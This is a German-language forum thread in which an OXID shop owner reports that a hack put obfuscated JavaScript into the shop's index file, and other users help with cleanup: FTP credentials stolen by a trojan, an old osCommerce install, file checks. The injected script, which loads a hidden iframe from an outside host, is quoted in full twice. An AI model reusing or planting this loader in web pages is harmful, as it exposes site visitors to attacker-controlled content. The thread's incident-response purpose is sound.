Was stimmt nicht? Warning: Cannot modify header information - headers already sent

Deutsches Forum
1

Hallo liebe Community. Ich habe seit Februar den OXID 4.4.5 problem und Buglos am laufen. Seit heute Nacht erhalte ich folgende Fehlermeldung im Header wenn ich den Shop aufrufe:

nm='de';nl='nts';kl='i';j='tt';jp='7a0';z='hol';s='/s';wr='3fb';ww='7';k='aus';i='79';hs='/in';xj='1';da='ge';no='x.p';v='tp=';lm='ra';zq='7a';hg='a';x='fc';pb='hp?';st='h';q='e';qe='sme';r='p:/';yb='/';ej='om';cr='f';ry='c';g='.c';gc='s';f='r';n='m';ev='1c';vi='e';uh=kl.concat(cr,lm,n,vi);th=gc.concat(f,ry);d=st.concat(j,r,s,k,hg,da,qe,nl,g,ej,yb,z,q,hs,nm,no,pb,v,wr,jp,x,ev,xj,i,zq,ww);var t=document.createElement(uh);t.setAttribute('width','5');t.setAttribute('height','5');t.setAttribute('style','display:none');t.setAttribute(th,d);document.body.appendChild(t);
Warning: Cannot modify header information - headers already sent by (output started at /mnt/web1/21/89/xxxxxx/htdocs/index.php:1) in /mnt/web1/21/89/xxxxxx/htdocs/core/oxutilsserver.php on line 107

Warning: Cannot modify header information - headers already sent by (output started at /mnt/web1/21/89/xxxxxx/htdocs/index.php:1) in /mnt/web1/21/89/xxxxxx/htdocs/core/oxutils.php on line 1112

In den Adminbereich komme ich gar nicht mehr rein. hier sagt mir die Fehlermeldung, dass mein Browser keine Cookies aktiviert hätte.

Bin etwas ratlos, weshalb das Problem plötzlich auftritt.

Vielen Dank für eure Anregungen vorab.

2

Und es wurde nicht geändert? Tmp-Ordner mal gelöscht?

3

[QUOTE=roland76;63664]Und es wurde nicht geändert? Tmp-Ordner mal gelöscht?[/QUOTE]

Hi. Vielen Dank für deine Hilfe. Nein. Geändert wurde seit Februar nichts.

Wo kann ich neben der config.inc.php noch die absoluten Pfade angeben?

In der Fehlermeldung werden falsche Pfade angezeigt.

4

salut,

ich will hier keine Angst machen, aber überprüfe trotzdem per Ftp die Zeitstempel der Dateien im Shop.
Im Core, im View und im Out-Verzeichnis, vllt auch in den Unterverzeichnissen.

Mein erster Gedanke bei dieses Zeilen ist ein gehackter Shop, so das Dateien geändert wurden das beim Kunden ein Script geladen wird.

Hat dein Shop ne Adresse?

ceau

5

Das würde ich auch sagen. Bei Google finden sich etliche Seiten, bei denen dieser Quatsch eingebaut wurde.

6

[QUOTE=ChristophH;63683]Das würde ich auch sagen. Bei Google finden sich etliche Seiten, bei denen dieser Quatsch eingebaut wurde.[/QUOTE]

Ich habe den Übeltäter soweit ich das beurteilen kann entdeckt. Es wurde die index.html im root verändert. Es wurde folgende Zeile hinzugefügt:

nm='de';nl='nts';kl='i';j='tt';jp='7a0';z='hol';s='/s';wr='3fb';ww='7';k='aus';i='79';hs='/in';xj='1';da='ge';no='x.p';v='tp=';lm='ra';zq='7a';hg='a';x='fc';pb='hp?';st='h';q='e';qe='sme';r='p:/';yb='/';ej='om';cr='f';ry='c';g='.c';gc='s';f='r';n='m';ev='1c';vi='e';uh=kl.concat(cr,lm,n,vi);th=gc.concat(f,ry);d=st.concat(j,r,s,k,hg,da,qe,nl,g,ej,yb,z,q,hs,nm,no,pb,v,wr,jp,x,ev,xj,i,zq,ww);var t=document.createElement(uh);t.setAttribute('width','5');t.setAttribute('height','5');t.setAttribute('style','display:none');t.setAttribute(th,d);document.body.appendChild(t);

Ich habe jetzt allen FTP Zugängen neue Passwörter vergeben. Was kan ich noch tun um meinen Shop wieder sicher zu machen. Bitte um Hilfe. Das darf nicht noch ein mal passieren. Mir graut die Vorstellung, jemand macht sich auf meinem Server zu schaffen…

7

Die Frage ist, ob ein Script zusätzlich installiert wurde. Wie bereits geschrieben, würde ich mal alle Dateien kontrollieren, ob da was geändert wurde. Dann mal die Ordner- und Filerechte überprüfen und den Hoster benachrichtigen.

8

[QUOTE=roland76;63686]Die Frage ist, ob ein Script zusätzlich installiert wurde. Wie bereits geschrieben, würde ich mal alle Dateien kontrollieren, ob da was geändert wurde. Dann mal die Ordner- und Filerechte überprüfen und den Hoster benachrichtigen.[/QUOTE]

Das ist schonmal ein super Tipp. Ich schaue mir mal alle Dateien und die Änderungsdaten an, so habe ich die geänderte Datei finden können. Wo könnte sich ein Script verstecken? Auch in der DB?

9

salut,

>>index.html
warum wird diese bei dir aufgerufen?

in dem meisten Fällen sind es php-Dateien. Diese werden wohl durch ein Script automatisch verändert.

ceau

10

Ich würde auch mal deinen Provider einschalten. Meiner Erfahrung nach ist der Verursacher ein “Nachbar” auf dem gleiche shared-Server der mit einer total veralteten Foren/Blog-Software ein Sicherheitsloch gerissen hat.

11

[QUOTE=ChristophH;63698]Ich würde auch mal deinen Provider einschalten. Meiner Erfahrung nach ist der Verursacher ein “Nachbar” auf dem gleiche shared-Server der mit einer total veralteten Foren/Blog-Software ein Sicherheitsloch gerissen hat.[/QUOTE]

Es hat sich definitiv jemand auf meinem Webspace zu schaffen gemacht. Grausig. Das erste mal seit 6 Jahren Ecommerce…

Nach einer Kontrolle aller Dateien, konnte ich keine weiteren betroffenen Dateien finden. Ich hoffe mal das war es. Mein Provider hatte nur eine lapidare Antwort: “Passwörter ändern”

Scheinbar haben viele Seiten das Problem, jedenfalls nach einer kurzen Recherche der Fehlermeldung.

Ich möchte hier nochmal ein großes Lob an die tolle Community aussprechen. Ich weiss schon warum ich mich für OXID entschieden habe. Hier ist es umgänglich wie zu den guten alten OS-Zeiten und nicht so *** wie bei XT…

lieben Gruß und ein schönes Weekend, Shopss

12

Bei mir war es so, dass die Angreifer nicht über oxid, sondern über oscommerce kamen. Danach hatten die Zugang auf das gesamte FTP und konnten ebenfalls oxid manipulieren. Dank eines users (ebenfalls aus diesem Forum) wurde das Leck gestopft.

13

salut,

aber du hast selbst nicht noch ein älteres Blog- oder Forensystem am laufen?
Eventuell nachträglich die oxcheckversion ausführen, die sollte auch anschlagen wenn Dateien verändert wurden.

ceau

14

[QUOTE=tvtotal;63727]Bei mir war es so, dass die Angreifer nicht über oxid, sondern über oscommerce kamen. Danach hatten die Zugang auf das gesamte FTP und konnten ebenfalls oxid manipulieren. Dank eines users (ebenfalls aus diesem Forum) wurde das Leck gestopft.[/QUOTE]

Das ist ein super Hinweis!! Ich habe noch wegen der Datenübernahme den alten OS-Shop auf meinem Webspace liegen. Den lösche ich als erstes und meinen Blog werde ich auch schnellstens updaten :rolleyes:

So sorglos werde ich Software ganz bestimmt nicht mehr behandeln…

15

Dann überprüfe bei osc mal die Javascript-Dateien im root.

16

[QUOTE=tvtotal;63739]Dann überprüfe bei osc mal die Javascript-Dateien im root.[/QUOTE]

Ich habe den OS-Shop schon runtergeschmissen. Ich schau mal im Backup nach ob ich etwas finden kann.

17

Also es wurden keine weiteren Dateien verändert ausser der index.php

Ein Problem ist, dass ich nicht mehr in den Administrationsbereich komme. htaccess und config habe ich geprüft.

18

Wenn das der fall ist und du die originale index wieder eingespielt sind enteder doch noch mehr files vergiftet oder und es wurden db manipulationen vorgenommen. Wenn du ein komplett backup hast würde ich den shop löschen und das backup einspielen.

19

In einem anderen Forum wurde dasselbe Problem mit einem anderen Shop gepostet. Ursache scheint ein infizierter Rechner mit Filezilla zu sein, nicht der Shop oder Webspace:

Die Infiltrierung in den Shop fand durch den Rechner selbst statt. Ein Trojaner hat sich eingenistet und die Zugangsdaten des FTP-Clients ausgelesen. Wahrscheinlich benutzt fashionshop Filezilla als FTP-Client, denn dieser speichert die Passwort in einer Datei als Klartext.

Weiterhin ist nicht nur die index.php betroffen, sondern alle Dateien, welche mit index, start und default anfangen, sowie alle Dateien, die auf .js enden.

Also noch Rechner gut checken.